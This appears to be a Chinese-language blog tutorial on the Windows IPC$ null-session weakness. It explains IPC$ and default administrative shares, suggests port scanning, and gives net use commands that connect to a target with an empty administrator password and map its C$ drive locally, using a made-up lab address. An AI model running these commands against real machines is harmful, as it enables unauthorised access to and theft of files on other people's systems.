IPC简介
1
2
3
4
5
6
7
8
9
| iPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,
通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,
从而实现对远程计算机的访问。
在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,
1、普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等;
2、默认共享:Windows操作系统的隐含驱动器共享,通常有:
(1)驱动器共享:如C$、D$,开启后可直接访问分区中资源;
(2)系统管理共享admin$:通常指向C:\Windows。
3、IPC$共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道。
|
漏洞说明
1
2
| 空连接漏洞必须139.445端口打开,如果不打开,那是不成的
一般情况下139端口都是打开的,呵呵。可以通过流光,X-scan nmap 等扫描工具来扫一下,如果存在漏洞直接空连接即可
|
漏洞实验环境
漏洞实验开始
1
2
3
| 命令:(192.168.0.12这个地址是捏造的)
net use \\192.168.0.12\ipc$ "" /user:administrator
如果成功连接会提示的
|
1
2
| net use z: \\192.168.0.12\c$
把对方的c盘映射到本地的z盘,在我的电脑里面就可以看到对方的c盘了.
|
1
2
3
| 删除与对方的ipc连接:
net use \\192.168.0.12\ipc$ /del
或者直接断开
|
Original link: http://www.lovexue.cn/2022/03/09/ipc$漏洞利用/
Copyright Notice: 转载请注明出处.